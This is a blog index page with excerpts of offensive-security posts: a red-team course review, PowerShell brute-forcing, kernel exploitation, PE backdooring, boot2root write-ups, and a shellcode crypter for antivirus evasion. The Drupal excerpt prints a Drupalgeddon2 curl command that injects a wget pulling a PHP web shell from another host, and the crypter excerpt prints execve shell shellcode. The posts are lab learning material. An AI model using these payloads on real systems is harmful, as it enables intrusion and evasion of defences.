Anurag's Blog

Few months ago I didn't know what Active Directory is, and why should I care about it and never heard about ACL abuse and all. Although I had attended a BPAD (Breaking and Pwning Active Directory) training which was provided by Nullcon but I was not confident enough to go for this course exam, since my day-today activity involves VAPT stuffs related to Web/Network/Mobile and sometimes basic malware analysis (very basic one :p).  I started doing offshore lab and took help from some friends in understanding few Active Directory concepts. I did many silly mistakes during the lab and learned a lot. Meanwhile I registered for Active Directory Lab Course and got it in a discounted offer for first 50 students of about 11k INR  ( 1 mont lab access) :). Before wasting time any further let's dive into the review. The course -  https://www.pentesteracademy.com/activedirectorylab Certification - Certified Red Team Professional The Course Content  - After paying the c...

Before we start I would like to bring your attention to this PSP course from Pentester Academy   - https://www.pentesteracademy.com/course?id=21 . The course is focused on Powershell scripting which can be used in pentesting activities. AGENDA  : 1. Introduction to Powershell 2. Basic Authentication lab setup 3. Brute-force Basic Authentication using Powershell Script -   - cmdlet   - IP,Port and word-list should be easily configurable 1.  Introduction to Powershell  -  Microsoft says- PowerShell is a task-based command-line shell and scripting language built on .NET. PowerShell helps system administrators and power-users rapidly automate tasks that manage operating systems (Linux, macOS, and Windows) and processes. PowerShell commands let you manage computers from the command line. PowerShell providers let you access data stores, such as the registry and certificate store, as easily as you access the file system. PowerShell inc...

Hello Readers, It's been so long since I have written any blog post but now, the time has come :p Firstly I thought of writing a series of tutorials on Active Directory Pentesting but setting up a good AD lab will take some time so we can learn it once the AD lab is ready ;) :) If you hate theories then you may not like this post because I have to include this in order to start it from scratch. I assume that you have some experience in binary exploitation because I won't be covering the user-land exploitation. Introduction  I thought of learning the basics of kernel exploitation on Win7 as a virtual environment. This blog post is a 0th part of this series on Windows Kernel Exploitation. Please feel free to point out mistakes, send suggestions and also criticize wherever you feel like ;)  Let us start !  Kernel - According to Wikipedia - a kernel is a central part of an operating system which manages the operations of the computer and hardware - most ...

Hello Readers, This post will cover Backdooring of P.E file by using code caves . There are already good tools to do this for you eg. Backdoor Factory and Shelter which will do the same job and even bypass some static analysis of few antiviruses . I will be covering the manual approach of backdooring a PE file . Let's understand some terms : [x] PE file : The Portable Executable (PE) format is a file format for executables, object code, and DLLs, used in 32-bit and 64-bit versions of Windows operating systems. [x] Code Cave : Wikipedia says - "A code cave is a series of null bytes in a process's memory. The code cave inside a process's memory is often a reference to a section of the code’s script functions that have capacity for the injection of custom instructions. For example, if a script’s memory allows for 5 bytes and only 3 bytes are used, then the remaining 2 bytes can be used to add external code to the script." [x] Shellcode : Wikipedia - ...

Hello Friends, This is my second write-up on a vuln machine Toppo 1 made by my bro Hadi Mene. Let's get Started .... After running nmap for the target machine , I found port 80 was open so I started enumerating from there. The first thing I try for any web app based challenge is - Running Dirbuster ;) Found an interesting file i.e notes.txt . Let's check it out in browser . Great, we got some password. It can be ssh credential or ftp etc. Since ftp port is closed therefore let's go for ssh login . Tried ted123 and ted as username . Luckily "ted" worked for me . So username - ted pass- 1234ted123 Now comes the privilege escalation part . This was the easiest part since this covers the basics of privilege escalations through SUID. I checked for the binaries whose setuid were enabled . setuid bit- Binaries with the setuid bit enabled, are being executed as if they were running under the context of the root user.  That moment when you see...

Hello Friends, This is my first boot2root writeup on a vuln machine made by my brother Manish Kishan Tanwar . This machine is based on latest vulnerability of Drupal CMS. Let's get started ... Since port 80 was open , therefore I tried testing the webapp. After looking at the source code , it was clear that the website was running on a cms called drupal.I verified the version of drupal from changelog.txt. The cms version of drupal used was 8.x. Suddenly something clicked my mind and I thought of giving a try for the famous drupalgeddon2 exploit.I tried exploiting through curl. I used following command to download a php web shell - curl -s -X 'POST'   --data 'mail[%23post_render][]=exec&mail[%23children]='"wget http://192.168.1.78/ninja.php"'&form_id=user_register_form'   'http://192.168.1.108/user/register?element_parents=account/mail/%23value&ajax_form=1' | cut -d ":" -f5 Through php shell , I got...

Before we start , I would like to bring your attention to this SLAE course from securitytube which will help you learn Shellcoding -  http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ AGENDA  : 1. Write encryption and decryption algorithm using high level language 2. Test encryption algorithm on shellcode 3. Verify decryption algorithm on encrypted shellcode I have used C# language and made a window based gui application in order to encrypt and decrypt shellcode using AES encryption schema. Crypter : A crypter is a program which encrypts the shellcode (in our case) so that anti-virus evasion can be done and has a module called decrypter which decrypts and execute the original shellcode. I will use execve shellcode and encrypt,decrypt it using our newly made custom crypter. execve Shellcode :  Extracted shellcode - "\x31\xdb\xf7\xe3\x04\x0b\x53\x53\x59\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80" C# ...